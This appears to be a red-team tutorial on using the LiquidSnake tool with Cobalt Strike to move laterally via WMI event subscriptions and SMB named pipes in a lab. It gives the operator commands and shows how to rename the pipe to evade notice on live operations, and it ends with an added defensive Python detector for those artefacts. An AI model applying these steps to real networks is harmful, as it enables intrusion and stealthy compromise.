LiquidSnake is a recently released lateral movement tool that uses WMI event subscriptions and SMB named pipes for shellcode transfer. The author, @dottor_morte, has also provided a Cobalt Strike aggressor script for easy integration with beacon.

Testing Vanilla LiquidSnake

Without modifying the LiquidSnake solution, set the target architecture to x64 and build - this will be our execute-assembly target from beacon.

I’ve got a beacon running on a Windows 10 system in my lab environment; we’ll be using this as the starting point for lateral movement.

[Figure: Initial beacon]

Using the user context (REDANIA\vizimir) already established in beacon, we’ll test moving to oxenfurt.redania.local. This can be accomplished with beacon’s execute-assembly function (or better yet, BOF.NET) and the compiled LiquidSnake binary:

execute-assembly /opt/aggressor/LiquidSnake.exe oxenfurt.redania.local

[Figure: LiquidSnake]

Make sure to wait for the full output to be received before continuing - during this time the WMI event subscription is being created and subsequently triggered. Once triggered, the target host will be listening on an SMB named pipe for shellcode to execute. By default, the named pipe used is \\.\pipe\6e7645c4-32c5-4fe3-aabf-e94c2f4370e7. We’ll come back to this value later.

The author has a BOF and aggressor script which can be used to deliver our beacon shellcode to the listening pipe. I’ve generated some stageless beacon shellcode tied to the HTTPS listener to send. First, load up the aggressor script:

[Figure: Aggressor Script]

Deliver the shellcode:

send_shellcode_via_pipe \\oxenfurt\pipe\6e7645c4-32c5-4fe3-aabf-e94c2f4370e7 /opt/aggressor/beacon.bin

[Figure: Send Shellcode]

And there’s our new beacon on the target:

[Figure: New Beacon]

Customizing the Named Pipe

If we’re to use LiquidSnake on a live operation, we’ll likely want to change the named pipe to better blend in. To do this, we’ll have to recompile the CSharpNamedPipeLoader solution from the LiquidSnake repo.

In Program.cs on line 410, set the pipe name to your preferred value:

IntPtr hPipe = CreateNamedPipe("\\\\.\\pipe\\MyNewPipeName")

Make sure the project architecture is set to x64 and compile. To work the edit into LiquidSnake, GadgetToJScript is used:

[Figure: GadgetToJScript]

Base64 up the resulting test.vbs file:

[Figure: Base64 VBS]

Paste that string into the LiquidSnake solution in Program.cs on line 29:

string vbscript64 = "RnVuY3Rbpb24gQmFzZTY0VG9..."

Recompile the project and it’s back over to Cobalt Strike. Repeat the previously used beacon commands, except this time sub in your custom named pipe value when running send_shellcode_via_pipe:

[Figure: Modded LiquidSnake]

And we receive our third beacon, this one using the custom pipe name:

[Figure: Third Beacon]
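From the defender's side, the two artefacts this walkthrough leaves behind are the WMI event subscription and the named pipe. The following is an added example, not code from the post or the LiquidSnake project: it scans constructed Sysmon-style log lines for the default GUID pipe quoted above and for WMI subscription activity, and shows why a renamed pipe (the customization section) is only caught by correlating the WMI events rather than by the pipe name. The key=value line format and every host name other than oxenfurt are assumptions made for the example.

```python
import re
from collections import defaultdict

# Default pipe name from the walkthrough; a recompiled loader can use any name,
# so the GUID-shaped check is a heuristic for unrenamed builds, not a signature.
LIQUIDSNAKE_DEFAULT_PIPE = r"\6e7645c4-32c5-4fe3-aabf-e94c2f4370e7"
GUID_PIPE = re.compile(r"^\\[0-9a-f]{8}(-[0-9a-f]{4}){3}-[0-9a-f]{12}$", re.I)

# Sysmon event IDs: 17/18 = named pipe created/connected,
# 19/20/21 = WMI event filter / consumer / filter-to-consumer binding.
PIPE_EVENTS = {"17", "18"}
WMI_EVENTS = {"19", "20", "21"}

# Constructed Sysmon-style events (key=value, one per line); not real telemetry.
# hostB and hostC are made-up names; hostB uses a renamed pipe as in the post.
SAMPLE_LOG = r"""
Host=oxenfurt EventID=19 Operation=Created Name=ConstructedFilter
Host=oxenfurt EventID=20 Operation=Created Name=ConstructedConsumer
Host=oxenfurt EventID=21 Operation=Created Filter=ConstructedFilter Consumer=ConstructedConsumer
Host=oxenfurt EventID=17 PipeName=\6e7645c4-32c5-4fe3-aabf-e94c2f4370e7
Host=oxenfurt EventID=18 PipeName=\6e7645c4-32c5-4fe3-aabf-e94c2f4370e7
Host=hostB EventID=17 PipeName=\MyNewPipeName
Host=hostC EventID=17 PipeName=\spoolss
"""

def parse(line):
    """Split one key=value line into a dict (values contain no spaces here)."""
    return dict(kv.split("=", 1) for kv in line.split())

def classify(event):
    """Return a finding label for a single event, or None if it is benign."""
    eid = event.get("EventID")
    if eid in WMI_EVENTS:
        return "wmi_subscription_activity"
    if eid in PIPE_EVENTS:
        pipe = event.get("PipeName", "")
        if pipe.lower() == LIQUIDSNAKE_DEFAULT_PIPE.lower():
            return "liquidsnake_default_pipe"
        if GUID_PIPE.match(pipe):
            return "guid_named_pipe"
    return None

def scan(log):
    """Group findings per host; a host showing both WMI subscription activity
    and a suspicious pipe gets an extra 'wmi_plus_pipe' correlation finding."""
    findings = defaultdict(list)
    for line in log.strip().splitlines():
        ev = parse(line)
        label = classify(ev)
        if label:
            findings[ev.get("Host", "?")].append(label)
    for labels in findings.values():
        if "wmi_subscription_activity" in labels and any(l.endswith("pipe") for l in labels):
            labels.append("wmi_plus_pipe")
    return dict(findings)
```

Note that hostB produces no finding at all: once the pipe is renamed, only the WMI subscription events (19/20/21) on the same host remain as a reliable signal.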